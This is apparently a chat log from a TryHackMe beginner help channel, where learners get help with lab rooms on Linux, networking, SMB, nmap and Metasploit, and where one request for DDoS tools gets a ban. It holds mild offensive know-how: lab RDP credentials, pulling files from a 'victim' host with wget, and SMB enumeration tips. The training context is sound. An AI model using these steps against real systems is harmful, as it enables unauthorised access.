Well if you come across a lot of things you never heard before and just read them 1 time in a room, it might be hard to keep everything. I personally started taking notes, the reason is that when I write down the most important parts of a room I remember them easier if I wrote them myself at least once. Also that you have something to look up afterwards on your own notes is a good thing. But overall, learning is always about repetition, so the more often you come across such terms, the easier you remember them.

Agreed. The simple act of typing the info in your notes will help you remember more. Grab a note application. Could be a text doc or something like cherrytree or blankslate (web based)
Jot down notes and refer to it later if necessary.

totally

@brittle birch if you still didn't find answer, watch YouTube video in this task. There is an answer. It's really tricky

Hi guys , I was learning Pre-Security. As soon as I completed Into to LAN and reached THE OSI Model , THM asked me to subscribe !😟 . Do any of you guys have TryHackMe Vouchers . If yes Please help me bcoz I really can't pay the amount since I am a school student

You dont have full access to pathways if you arent subscribed. However that dosent mean you cant use the site. There are plenty of other free rooms you can do

@median mica if we skip the paid rooms, does it severely affect the learning in future?

good morning/evening/night guys

i am stuck here and dont know how to use the game

just moving around

arrows + spacebar to enter a doorway

thank you

Gave +1 Rep to @turbid grove

Hello

Does the ARP protocol works across the network?

Can you clarify your question?
It has to work over the network otherwise you'd not gain any new information from it

Depending on what do you mean with "across the network"
ARP works on layer 2 (MAC Addresses) so it can not be routed

So it works only between devices in the same ip subnet

On different subnets (splitted by routers) routing tables are used

Fun Fact: the NDP Protocol (ARP for ipv6) is also vulnerable to Spoofing, because to pretend that, some signature would be needed in the protocol, which was discussed while working on ipv6 (but the advantage is not high enough to implement such time consuming things into a protocol)

And for preventing ARP/NDP Spoffing there are some solutions: client based (always bad) or on switches

can my wifi provider see my history ?

Yeap..sure

Any way around that? Are VPNs enough?

Mh, what do you mean?

VPNs are enough but then you're letting the VPN provider see your searches

anybody pls explain to me the 3 way handshake part on the packets and frames section

They can see the websites you accessed if you use their recursive DNS server, it's not guaranteed that they're going to keep a history but it's possible

so I think using a vpn and a public server like cloudflare would solve that

which part didn't you understand?

the part before the tcp closing connection

the table showing the initial sequence no etc

@marsh veldt let's keep it appropriate for an educational environment

using a vpn would, but even if you change your dns to cloudflare, the dns packets are still routed through the isp network in cleartext

Hey guys! Im currently in Linux Fundamentals Part 1 and I am noticing that the box AttackBox that we launch for the room doesn't correlate to the questions we are asked. Has anyone else ran into this issue?

Can you elaborate a little more please

I will try and send screenshot

I am doing Linux Fundamentals Part 1

Task 5 Interacting with File System

you ll have to verify to send pics

!docs verify

Gotcha! I am now verified

So I answered the questions based off the youtube answers.. the box that it lets me deploy in the website is different than the box in the video

I just hope this isnt a re-occuring issue with later lessons

It is because that machine is "your" machine not the machine that you are supposed to attack

Maybe try to terminate it and re open it

hmmm.. okay! I see what you mean

In task 3 it gives me a machine to launch, but its not the machine used for the room, but "my machine" which I would rather have the machine for the room for now

victory!! it worked!

Yay 😄

Hi

Hi

hello guys, may someone kindly please help me in the subdomainenumeration task 6, i have failed to answer the question close to one and a half weeks

@void grove Please do not spam the same question over several channels

sorry man

How necessary is it to write down extensive notes during this pathway?

it's always a very good idea to take notes, just don't let it slow you down so much that it becomes a chore

im making condense notes of the most important stuff

I noted down all the important bits of the stages of the network tree

hello, can someone please explain to me why i keep getting this error? https://i.imgur.com/2isjAfx.png

Because the default port you are trying to open a server (8000) is already occupied

do python3 -m http.server <random port number>

thank you!

Hi everybody, after 3 weeks of not improving i am still stuck at SMB task 4. I need to find out which document contain valuable information about the profile..... how ca i open the files?

what room are you doing

sorry, Network Service Task 4 Exploiting SMB

You can either use get to download it or use more to "read" it . Also you have to find a way around the spaces in the filename.

If you type ‘help’ while connected via smbclient it will give you info about what you can do

i tried to scopy and get the file buuutt....the space was the problem i think

what does the D, DH, and H mean?

Have you tried to google it already?

shame on me of course not xD

o.m.g... I did it! it was pain... not gonna lie xD THX @soft snow & @remote hemlock

Gave +1 Rep to @soft snow

ha ?

layer 8 exist ?

Nevermind,in this module https://tryhackme.com/room/extendingyournetwork is not specified in what layer operate firewall

some research on google never hurts 🙂

Hello

Im a new candidate

hello everyone I'm new here nice to meet you 🙂

idk how to solve this,any hints ?

nevermind i solved this

How ?

you need to drop packets from first pc

100.34 or 113.99

100.34

Hmm Thanks

and in the label "Destination IP" put 110.1

i hope you understood

✌🏻

my english is not very good 🙂

But my understanding is good
No Problem ✌🏻

hi. someone knows why in root linux fundamentals part 1, in the machine deployed the user es root and not tryhackme?

probably SSH conn

Probably because you are on the attackbox and not the target machine

Hey

Guys I want to start ethical hacker on tryhackme.com

What path should I take first

Pre Security.

You mean this?@warm epoch

That says Pre Security, which is what I said.

Ok calm down

I mean, it matches exactly what I said.

You may also have trouble doing it from mobile.

I'm sorry ok? I just wanted to be sure

I will do it on pc

Hi everyone

All are beginner here?

Like me

yep

I'm a beginner too

I'm a beginner too

Hello

World

after pre sec path what path do you recommend to choose ?

I think Complete Beginner is good after pre sec

Awesome sounds good, getting started with the pre-security path, has been informational and smooth. I may choose complete beginner also...........the other recommended choice is Linux I believe. Tomorrow is the start of the Christmas room suitable for beginners that starts tomorrow..... Advent of Cyber.

I’m stuck on this question “what is the syntax to ping 10.10.10.10?”.

you have written it in your question 😉

I don’t know what to submit as an answer

What's the command you would type to ping 10.10.10.10 ?

depends on what you use

for say you use cmd

it would just be ping followed by 10.10.10.10

ex; ping 10.10.10.10

I'm stuck on windows fundamentals part 1: task 7, it won't let me edit the permissions for SYSTEM, anyone know why?

Hi I want a free website attacks ddos

:pepebruh:

What you mean with that?

-ban @digital aurora Asking for Ddos websites or services are unethical and not what we do here. Appeals are bans@tryhackme.com

🔨 Banned ! 𝑺𝐩𝐞𝐞𝐝𝟕#9994 indefinitely

Well...look at the format for the answer: 4 characters followed by a whitespace followed by an IPv4 address....
Is there anything in your "I'm stuck..." message that actually resembles that? 😉 😉

Hello, what am i doing wrong please? Im supposed to download a text file from a remote machine, but nothing happens after the wget command

tryhackme@linux3:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)
wget http://10.10.164.67:8000/.flag.txt

Hold on

Could you add the following detail? Where are you running these commands?

on the "attacker" host or on the "victim" host?

this is a task in Linux Fundamentals Part 3

im on the victim host i think

logged in to "mine", then SSH to the remote machine

as per instructions/screenshots

started the attack box, SSH to a remote machine
following the instructions
starting web server with python3 -m http.server command
then wget, but nothing happens

task 4 in https://tryhackme.com/room/linuxfundamentalspart3

I see...BUT....

starting web server with python3 -m http.server command

This part. Where are you doing it?

on the remote machine

the one i SSH into

The idea of starting the http server is when you want to transfer a file FROM the attacker into the victim

or well, vice verse

Perfect and now....

wget http://10.10.164.67:8000/.flag.txt

I guess you are executing this command on the attacker host, right?
And the IP is the victim's host IP, right?

(so you should have 2 open terminals...or 1 if you closed the SSH connection after running the http command on the victim's host)

I see

(if you don't think I'm making sense or don't understand something I'm saying please say it! We are here to give a hand 🤝 )

Thanks very much, yes it's working now. Starting the http server on a victim box, then downloading with wget from the attacker box

Thank you again 🙂

You got it? I'm glad it worked!

You're welcome. Please pass by again if something else comes up or you have any doubt.

Will do, much appreciated

Me again, im stuck with an answer for question:
When will the crontab on the deployed instance (10.10.57.138) run?

@reboot /var/opt/processes.sh

the job stars after each reboot / everytime linux starts, is that correct?

the answer should be one word of 7 characters 🙂

restart - wrong answer

could someone guide me to the correct answer please?

You have the answer right here.

that's the problem, when i write reboot as the answer, it says it's incorrect

restart also incorrect

the correct answer should have 7 characters, as there are 7 * in the field

You have a symbol to add, don't you? 🙂

ok, the process will run at reboot OR @amber oar :))

many thanks 🙂

Yah thanks I get it now

Gave +1 Rep to @livid bloom

.

🕊️

in the activity "Extending Your Network" in the attack box. how do you figure out that 80 is the port that stops the attack?

i understand the ip stuff but not really the port? as in what determines why a particular port is the correct choice

figured it out by reading back. but does every router use port 80 to connect to the internet?

You mean router....or web server??

im not sure haha? i think router right?

going by the picture in the activity it shows a network on port 80 connecting onto a router on port 80 which then connects to the internet

is port 80 a special thing or just used in this example

oh that's just an example

ah i see

Yeap it is actually!

There's a list of "well-known" ports that are usually used for specific services

You would expect a web server if you see only port 80 or 443 open, to name an example

in real life, your router connects to the internet and opens a connection through any port (This is related to Port Address Translation)

ah ok so on a server being attacked (like in the attack box) blocking accesses port 80 would be the way to go

mind you would drop all connections both benign and malicious!

but it's an option in case you need it

but it would stop an attack from a hostile PC

yes indeed (Assuming no other port is open)

I see i see!

you could blacklist IPs too (But blacklisting manually is not recommended as it doesn't scale well...if you can automate it somehow then yes)

yea i would assume that would be a basic scenario

thanks for you help!

You're welcome! Any other question, pass by again!

Is it just me or does the task 6 site in Extending your network not work?

Opening it on a new tab and refreshing the same tab don't work either

To clarify the error is that no packet is sent on the simulation itself

Hi I am new here could I ask a question please re. AD Hacking

Sorry I think I've selected the wrong path ! I will ask again in complete-beginner path

Try another browser chrome, Firefox, etc

Can i ask for tips on this channel about Web Security?

This channel is specifically for the TryHackMe Pre-security path

Yo guys, just started the pre-security path today. Looking forward to learning much more

hey, that's nice! good luck and have fun~ 🙂

hv u subscribed or thm?

I’m not subscribed yet. I plan to sub sometime after I complete the beginner rooms

Okk.. just make sure you don't leave the concepts whose rooms are locked . Learn them from internet (youtube videos are a good source). Happy Hacking😁

whats up everyone just started the pre sec path on THM would love to have some friends to keep me accountable on my learning path! looking to hack around 4-5 days a week

if you wanna friend me on THM my username is stevethemenace 🙂

doubt

for those who just started out dont talk about your future focus on learning you cant predict what happens next

hi, i have a problem with linux fundamental part 1, with the question "what is the username of who you're logged in as on your deployed linux machine ?" i typed "whoami", it said i'm logged with root, but tryhackme said i have a wrong answer.

You're currently using the attack box.
That's not the target machine, which is why your answer is wrong.

Ho, it said i have choice, VPN or AttackBox

Ok, gonna try with vpn, thx 🙂

@spare swift No

There are two machines involved

The target and the attacker.

Attackbox or VPN is your choice for the attacker.

You need to use the target machine in the room. The "Start Machine" button.

If you've already deployed that as well as the attackbox, there are tabs along the bottom right to swap between them.

Haaa ok thanks for the information, i'll try again later

i cant get the attack box to open? am i missing something?

start machine and start attack box are different things. I think that's a common mistake.
I recommend using your own vm as it's much faster than the web based attack box in my experience.

your own vm
Why do you even need a VM? You can ran everything from you local machine.

Well, most people don't have for example kali linux as their main OS on their local machine, that's why using a kali VM.

Isolation
Snapshots for easy recovery
Not messing about with dual boot especially when Windows updates

Hello, guys. I have a problem in Linux Fundamentals Part 3, Task 8. I need to access the Apache logs but the user provided (tryhackme) does not have access. Do you know if there is any way to access the logs?

Look at the files.
Which do you have access to?

Try ls with long list.

Thanks for the tip. I had stopped the machine. Starting again. Will start in a minute.

Gave +1 Rep to @warm epoch

Thanks a lot. Accessing the other one and not access.log was ok. Thanks a lot!

Gave +1 Rep to @warm epoch

Hi, I'm having issues with the nmap section, anyone care to assist me?

In task 14 (Practical), I'm unable to find out what the target machine ip is. 1st question: Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)?

That means you haven't deployed the target

Go back to the task with the "Start Machine" button and click it.

Hmmm, yesterday I did that but it did not resolve my problem, currently trying again

I mean that's the problem here

Or you're blocking JS which will break pretty much the whole site

I'm using plain safari, which shouldn't block JS.

I've started the machine and it's still not showing target ip

Just confirmed JS is enabled

It takes one minute to display.
It will display a countdown under the big red Active Machine Information heading

Can I post a screenshot?

!docs verify

You need to verify in order to post images in this server

Done

Scroll up

Top of the page above the tasks

You haven't deployed the target

Go to task 1

Oh damn, my bad

Click "Start Machine", the green button at the top right of the task

Got it! Thanks

I thought it would deploy with the attackbox

The attack box is a convenience

It's an alternative to using your own Kali machine etc and VPNing in

Thanks. How do I download the .ovpn to use vpn?

!vpn

Thanks

Hey all, I've a question I can't figure out on this path. It's in the Windows Fundamentals Part 1 room, task 3.
Here's the question :

Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?
Can I have any hint, please ?

Nevermind I've found.

!docs verify

I'm having issues with the metasploit section, can anyone assist me?

You are more likely to get help if you ask your question right away. Explain your issue, what room, what task, etc.

In task 5 I'm having a hard time using the exploit and gaining control over the target as the exploit fails

It's in the pentesting tool series

Show a screenshot of the options you have set with show options

My bad, wrong lhost ip.

I must miss something, 'cause I don't find the answer to the task 8 of win fundamentals 1....
The question :

In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?
Spoiler about what I did : ||I right click on the desktop, then chose "View", then "Small icons". The last setting is "show desktop icons", and it says me that it is a wrong answer. Then I've searched both settings and control panel, and I don't find anything that allows me to resize icons....||

You just enter control panel in the search, open it and at the top right corner you can set the icon size.

Oh, I didn't understand the question the right way! Thanks!

Gave +1 Rep to @soft snow

Hi guys I am having difficulties learning using my phone

Like what?

If you are talking about visual issues with the deployable machines (test examples/minigames) then you can try making the deployable machine fullscreen which will open a page dedicated to the minigame where you wull be abel to see better, alternatively you can turn your browser to desktop mode, almost all browsers have this feature and you can search up how on your browser. Once its on desktop mode you can zoom in to see text better

@harsh reef /\

I will try that

Test examples and games

Oh
It's like pingy said
Try using desktop site option from your browser
And maybe use termux for using some basic tools

ez-pz

congratz.... now you have inspired shadow to do osint on this name

Need some help within Windows Fundamentals 1. When I use "xfreerdp /u:administrator /p:letmein123! /v:10.10.20.248" I get the following error:
[12:47:59:923] [11856:11857] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[12:47:59:938] [11856:11857] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[12:47:59:938] [11856:11857] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[12:48:14:953] [11856:11857] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[12:48:14:953] [11856:11857] [ERROR][com.freerdp.core] - failed to connect to 10.10.20.248

have you connected to the vpn... or are you using the attackbox

Thank you very much. That was the problem...

Gave +1 Rep to @potent wedge

no problem... good for you to realise and know how to handle the problem

Will I be greeted with the same error messages if I run it on THM's Attack-box?

What you mean?

I wonder what Timos was running to get all those error messages.

Xfreerdp

It's quite verbose

Well just xfreerdp to connect to the windows machine but most likely wasn't connected to the vpn on his own machine.

Was this supposed to be run on cmd prompt?

No. Xfreerdp couldn't connect because it couldn't reach the server

Due to no von connection

wht is no von?

Attackbox doesn't need a vpn connection to connect to targets. So you would never reproduce it. If you get same error it's because target is down

*vpn

Oh, so browser based Attack-Box was creating the error while trying to run the ovpn from the terminal rather than the local VM Attack-Box terminal?

You can connect to THM targets from your own machine. Without browser based attack box.

For that you need to connect to thm vpn.

Ok, thank you.

Gave +1 Rep to @tired thicket

@fresh grove "TryHackMe | OpenVPN" https://tryhackme.com/room/openvpn

For reference

So what happened, they tried to connect to target from their own machine/vm without a vpn connection up

(at least that's how i understood it)

Just finished this it was a blast! Off to complete beginner! Wish you all best of luck if anyone has questions @ me while it's fresh in my head

how the web works - how websites work, challenge 3, the hint gives different code than the question? am i missing something? it doesn't work correctly with the code the hint uses

?

which hint and which question?

It was task 3 question 2, "Add the button HTML from this task that changes the element's text..."

i have a screen shot if that helps

i have a screen shot if that helps

ahh the 'optional' one

yeah i just copied the code and change dhack the planet to button clicked

you dont get a special flag or anything

yeah, i got it to work but realised the hint didn't get me a result

i put the code in wrong at first but didn't realise (tried to put it between the <script> tags) so clicked hint, then copy and pasted that, and it didn't do anything for me (after putting it in the correct place)

then i realised that the code in the block of text and the code in the hint are different

oh, i didnt copy from the hint, i copied from the code just above the questions area

HTML elements can also have events...

i didnt even read the hint, but yeah that should say Button Clicked and not Hack the Planet

otherwise its the exact same code as far as i can tell

for whatever reason, it doesn't seem to actually change anything compared to the correct code

i guess it's probably not an actual editor but just does the required change when you put the right text in? idk, but yeah it stumped me for a minute or two before i thought to check it against the code in the body of the text

only difference is what "demo" tag displays. EIther Hack the Planet or Button clicked

and it only does that after you click

onclick=

huh, i must've still been making an error then because when i used the "hack the planet" code it didn't do anything on click, but when i used the other one it did

they might have something on the backend to check for the 'button clicked' string

like if you do the 1st question and put Planet the Hack you wont get a flag

hey guys, i need a little help in the "Network Services" room. I have to enumerate a machine with Telnet. So I nmap but all ports are closed. Killed the machine but same result :(

Hello. I'm stuck into the Linux Fundamentals part 3, task 4. When i try to connect to ssh the password is always wrong

Give the machine a couple of minutes to fully boot, as far as I know this machine tasks a bit longer to fully boot.

What's the user and password you use?